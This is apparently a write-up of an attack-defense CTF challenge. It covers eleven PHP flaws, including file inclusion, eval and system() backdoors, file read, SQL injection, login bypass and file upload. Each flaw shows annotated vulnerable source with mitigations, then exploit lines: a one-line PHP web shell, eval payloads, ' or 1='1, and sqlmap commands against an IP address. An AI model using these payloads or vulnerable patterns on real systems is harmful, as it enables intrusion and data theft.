AWD——yunnan_simple Writeup

1.文件包含漏洞

源码

<?php
    // Vulnerable as shown: the 'file' query parameter goes to include unchanged,
    // so the requester decides which path PHP loads (local file inclusion).
    // There is no allowlist, no extension check and no directory restriction here.
    // Mitigation: map the parameter onto a fixed allowlist of known page names and
    // include only those; never build an include path from request data.
    $file=$_GET['file'];
    include $file;
?>

漏洞利用

/about.php?file=../flag

2.代码执行漏洞

源码

// Backdoor as shown: eval() runs whatever PHP code arrives in request parameter 'c'
// ($_REQUEST covers GET and POST, and cookies depending on request_order), and the
// leading @ suppresses the error output.
// Mitigation: delete the line; no filter makes eval() of request data safe.
// Detection: search the web root for eval()/assert() applied to superglobals and
// compare the deployed files against a known-good copy.
@eval($_REQUEST['c']);

漏洞利用

/config.php?c=system('cat ../flag');

3.任意文件读取漏洞

源码

<?php
    include 'header.php';
    // Vulnerable as shown: 'path' comes straight from the query string and is used as the
    // file to open, so any file readable by the web server user can be returned.
    // Mitigation: resolve the path with realpath() and require the result to sit inside
    // one intended base directory (or accept only names from a fixed allowlist).
    $file_path = $_GET['path'];
    if(file_exists($file_path)){
    // The handle is never closed in this excerpt (no fclose() call is visible).
    $fp = fopen($file_path,"r");
    $str = fread($fp,filesize($file_path));
    // The content is echoed without HTML escaping; only CRLF is replaced by <br />.
    // Escape with htmlspecialchars() before inserting the line breaks.
    echo $str = str_replace("\r\n","<br />",$str);
                            }
?>

漏洞利用

/contact.php?path=../flag

4.代码执行漏洞

源码

<?php 
    // Backdoor as shown: POST parameter 'shell' is handed to system() unchanged, so the
    // requester runs operating-system commands as the web server user. This is OS command
    // execution rather than PHP code execution.
    // Mitigation: remove the block; nothing in this excerpt needs a shell.
    // Detection: look for system()/exec()/passthru()/shell_exec() fed from superglobals.
    $shell=$_POST['shell'];
    // The command runs before the emptiness test below, so that test only decides
    // whether the rest of the page is rendered afterwards.
    system($shell);
    if($shell !=""){
        exit();
    }
?>

漏洞利用

ls /
# app bin boot data dev etc flag home lib lib64 media mnt opt proc root run run.sh sbin srv sys tmp usr var web
cat /flag

5.代码执行漏洞

源码

<?php 
include 'header.php';
// Backdoor as shown: eval() runs the PHP code supplied in request parameter 'aa', and
// the @ prefix suppresses the error output. Same pattern as the 'c' backdoor in
// section 2, under a different parameter name.
// Mitigation: delete the line. When cleaning a host, search for every eval() on
// request data; removing one copy leaves the others in place.
@eval($_REQUEST['aa']);
?>

漏洞利用

/index.php?aa=system('cat ../flag');

6.SQL注入漏洞

源码

<?php
    include 'header.php';
    // NOTE(review): $dbc is not defined in this excerpt; presumably config.php creates
    // the mysqli connection. Confirm.
    include_once('config.php');
    if (!empty($_GET['id'])) {
    $id=$_GET['id'];
    // Vulnerable as shown: $id is interpolated into the SQL text unquoted and
    // unvalidated, so the request can change the structure of the query (SQL injection).
    // Mitigation: use a prepared statement (mysqli_prepare() with "WHERE id=?" and
    // mysqli_stmt_bind_param()), or at minimum cast the value to int before use.
    $query = "SELECT * FROM news WHERE id=$id";
    $data = mysqli_query($dbc,$query);  
    }
    // $data is assigned only inside the if above; when 'id' is missing or empty this
    // call receives an undefined variable. The mysqli_query() result is not checked
    // for false either.
    $com = mysqli_fetch_array($data); 
?>

漏洞利用

#sqlmap检测
python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1
#列出所有数据库
python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1 --dbs
#列出指定数据库的表
python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1 -D cyber --tables

7.代码执行漏洞

源码

<?php 
    // Same backdoor as in section 4: POST parameter 'shell' is passed to system()
    // unchanged, giving OS command execution as the web server user.
    // Mitigation: remove the block from every file that carries it. Because the same
    // snippet appears in more than one file, a defender needs a search of the whole web
    // root (or a diff against a clean copy), not a single-file fix.
    $shell=$_POST['shell'];
    // Executed before the emptiness test; the test only controls the later exit().
    system($shell);
    if($shell !=""){
        exit();
    }
?>

漏洞利用

ls /
# app bin boot data dev etc flag home lib lib64 media mnt opt proc root run run.sh sbin srv sys tmp usr var web
cat /flag

8.万能钥匙

源码

<?php
    // NOTE(review): $dbc and session_start() are not visible in this excerpt;
    // presumably config.php provides both. Confirm.
    include_once('config.php');
    if (!empty($_POST['username'])) {
    $user=$_POST['username'];
    // 'password' is read without an isset() check; a request without it raises a notice.
    $pass=$_POST['password'];
    // Vulnerable as shown: both values are interpolated inside single quotes with no
    // escaping, so a quote character in either field changes the WHERE clause (SQL
    // injection, here an authentication bypass).
    // Mitigation: prepared statement with bound parameters. The password is also
    // compared inside SQL as a plain string; select the row by user name only and
    // verify a password_hash() value with password_verify().
    $query = "SELECT * FROM admin WHERE user_name='{$user}' and user_pass='{$pass}' ";
    $data = mysqli_query($dbc,$query);  
     // Login succeeds whenever exactly one row comes back, however the WHERE clause was
     // satisfied.
     if (mysqli_num_rows($data) == 1) {
        $row = mysqli_fetch_array($data);
        $_SESSION['username'] = $row['user_name'];
        // No exit follows the redirect in this excerpt, and the session id is not
        // regenerated on login (session_regenerate_id()).
        header('Location: ./admin/index.php');
     }else{
       // The submitted user name and password are echoed back unescaped (reflected XSS,
       // and the password ends up in the response body). Use htmlspecialchars() and do
       // not echo the password at all.
       echo '<hr/><center><br/>用户名:',$user,'<br/>密码:',$pass,'<br/><br/>用户名密码错误</center>';
       }   
} 
?>

漏洞利用

' or 1='1

9.信息泄露

源码

<h3>flag:<?php /* Information leak as shown: the page runs a fixed command and prints the flag file to every visitor, with no request input or authentication involved. Mitigation: remove the system() call from the template. */ system("cat /flag")?></h3>

10.任意命令执行

源码

<?php 
    // Backdoor as shown: query parameter 'p' is executed as an OS command via exec().
    // Mitigation: remove the block. If a page really has to start a program, call a
    // fixed command and pass validated arguments through escapeshellarg().
    $p=$_GET['p'];
    // The raw parameter is echoed without escaping (reflected XSS on top of the
    // command execution).
    echo $p;
    // exec() returns only the last line of the command output; var_dump() prints it.
    $q=exec($p);
    var_dump($q);
?>

漏洞利用

/admin/header.php?p=cat /flag

11.文件上传漏洞

源码

// Upload handler. Weaknesses visible in this excerpt:
//  - the stored extension is the last 4 bytes of the client-supplied file name, with no
//    allowlist, so a script extension such as ".php" is kept;
//  - the target is ./upload/ under the web root, named time() + extension, and the
//    resulting path is echoed back to the client;
//  - the only content check is a substring test for one word;
//  - $error, $size and $type are read but never used.
// Mitigation: accept only an allowlist of extensions, verify the detected content type
// server-side (e.g. finfo_file()), generate the stored name server-side with
// random_bytes(), and store uploads outside the web root or in a directory where the
// web server does not execute scripts.
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
// Nothing in the shown body throws an Exception, so the catch below is not reached by
// these calls; fopen()/fread() report failure through return values and warnings.
try{
    if($name!=="")
    {
        // Attacker-influenced: taken from the original file name, not from the content.
        $name1=substr($name,-4);
        if(is_uploaded_file($tmpName)){
            $time=time();
            $rootpath='./upload/'.$time.$name1;
            // The handle is never closed in this excerpt.
            $file=fopen($tmpName, "r") or die('No such file!');
                    $content=fread($file, filesize($tmpName));
                    // Keyword blacklist only; it says nothing about whether the file is
                    // an image or a script.
                    if(strstr($content,'fuck')){
                            exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");
                    }
            if(!move_uploaded_file($tmpName,$rootpath)){
                echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";
                exit;
            }
        }
        // Printed even when is_uploaded_file() was false; $time is unset in that case.
        // $name1 is echoed without HTML escaping.
        echo "上传成功:/upload/".$time.$name1;
    }
}
catch(Exception $e)
{
    echo "ERROR";
}

漏洞利用

#传入一句话木马1.php
<?php @eval($_REQUEST['c']);?>
/admin/upload/1718338939.php?c=system('cat /flag');